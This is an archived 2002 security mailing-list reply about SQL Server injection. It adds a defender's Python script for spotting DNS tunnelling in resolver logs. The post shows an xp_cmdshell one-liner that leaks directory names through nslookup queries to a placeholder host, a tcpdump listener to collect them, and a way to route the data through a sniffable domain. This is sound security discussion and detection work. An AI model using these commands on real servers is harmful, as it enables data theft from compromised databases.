Re: Manipulating Microsoft SQL Server Using SQL Injection (+ DNS Tunnels) (fwd)

From: Haroon Meer (haroonat_private)
Date: Tue Sep 03 2002 - 03:07:00 PDT


    Hi.
    
    Nice paper :> We have found that outgoing connections are almost always
    blocked (especially from SQL servers that are a little deeper in the DMZ
    than the 'net facing webservers). (DNS requests often slip by)
    
    If you can execute commands remotely (through ur xp_ of choice) then you
    can use batch commands to throw together a simple DNS tunnel.
    
    Example..
    -snip-
    exec master..xp_cmdshell 'for /F "usebackq tokens=1,2,3,4*" %i in (`dir c:\*.`) do (nslookup %l. YOUR_IP_HERE)'
    
    Running a sniffer on host YOUR_IP_HERE (with an awk / split or two)
    
    Wh00t:~# tcpdump -l dst YOUR_IP_HERE and port 53 | awk '{print $7}'
    
    .
    WINNT.
    tools.
    bytes
    
    -snip-
    
    If outgoing DNS isn't allowed directly, you can still have some joy
    requesting %variable.DOMAIN_U_CAN_SNIFF.com and letting it follow its DNS
    path..
    
    ======================================================================
    Haroon Meer                                                         MH
    SensePost Information Security                          +27 83786 6637
    PGP : http://www.sensepost.com/pgp/haroon.txt     haroonat_private
    ======================================================================
    
    On Wed, 28 Aug 2002, Aaron C. Newman wrote:
    
    > Hi All,
    >
    > I just posted a short white paper on Microsoft SQL Server and SQL
    > Injection titled "Manipulating Microsoft SQL Server Using SQL Injection"
    > at:
    >
    > http://www.appsecinc.com/news/briefing.html#inject14
    >
    > The paper was written and researched by Cesar Cerrudo
    > (sqlsecat_private).
    >
    > All comments are welcome.
    >
    > Regards,
    > Aaron
    > _______________________________
    > Aaron C. Newman
    > anewmanat_private
    > CTO/Founder
    > Application Security, Inc.
    > www.appsecinc.com
    > Phone: 212-490-6022
    > Fax: 212-490-6456
    > - Protection Where It Counts -
    >
    >
    >
    >
    
    
    
    
    ----------------------------------------------------------------------------
    This list is provided by the SecurityFocus Security Intelligence Alert (SIA)
    Service. For more information on SecurityFocus' SIA service which
    automatically alerts you to the latest security vulnerabilities please see:
    https://alerts.securityfocus.com/
    
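A defender-side check for the two behaviours described in the message above, added here as an example and not part of the original post: it flags internal hosts that send DNS queries straight to a server outside the approved resolver set, and hosts that look up many distinct subdomains of one parent domain through the normal resolver path. The log records, addresses, domain names, resolver list and threshold are all constructed assumptions.

```python
from collections import defaultdict

# Constructed sample records: (source host, DNS server queried, query name).
SAMPLE_QUERIES = [
    ("10.0.5.20", "10.0.0.53", "www.example.com."),
    ("10.0.5.20", "10.0.0.53", "www.example.com."),
    ("10.0.9.7", "203.0.113.9", "WINNT."),
    ("10.0.9.7", "203.0.113.9", "tools."),
    ("10.0.9.7", "10.0.0.53", "WINNT.collector.example.net."),
    ("10.0.9.7", "10.0.0.53", "tools.collector.example.net."),
    ("10.0.9.7", "10.0.0.53", "bytes.collector.example.net."),
    ("10.0.9.7", "10.0.0.53", "Inetpub.collector.example.net."),
]

APPROVED_RESOLVERS = {"10.0.0.53"}  # assumption: the site's internal resolvers
UNIQUE_LABEL_THRESHOLD = 3          # assumption: tune against baseline traffic


def split_labels(qname):
    """Lower-case a query name and split it into labels, ignoring the root dot."""
    return qname.rstrip(".").lower().split(".")


def find_suspicious(queries, resolvers=APPROVED_RESOLVERS,
                    threshold=UNIQUE_LABEL_THRESHOLD):
    """Return findings for direct-to-outside DNS and high-cardinality subdomains."""
    findings = []
    seen_direct = set()
    subdomains = defaultdict(set)
    for src, server, qname in queries:
        # Case 1: the host bypasses the approved resolvers entirely.
        if server not in resolvers and (src, server) not in seen_direct:
            seen_direct.add((src, server))
            findings.append(("unapproved_resolver", src, server))
        # Case 2: collect the distinct prefixes seen under each parent domain.
        # The parent is taken naively as the last two labels (not PSL-aware).
        labels = split_labels(qname)
        if len(labels) > 2:
            parent = ".".join(labels[-2:])
            subdomains[(src, parent)].add(".".join(labels[:-2]))
    for (src, parent), subs in sorted(subdomains.items()):
        if len(subs) >= threshold:
            findings.append(("many_unique_subdomains", src, parent, len(subs)))
    return findings


if __name__ == "__main__":
    for finding in find_suspicious(SAMPLE_QUERIES):
        print(finding)
```

On a database server that has no reason to resolve external names, either finding is worth an alert even at a threshold of one.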


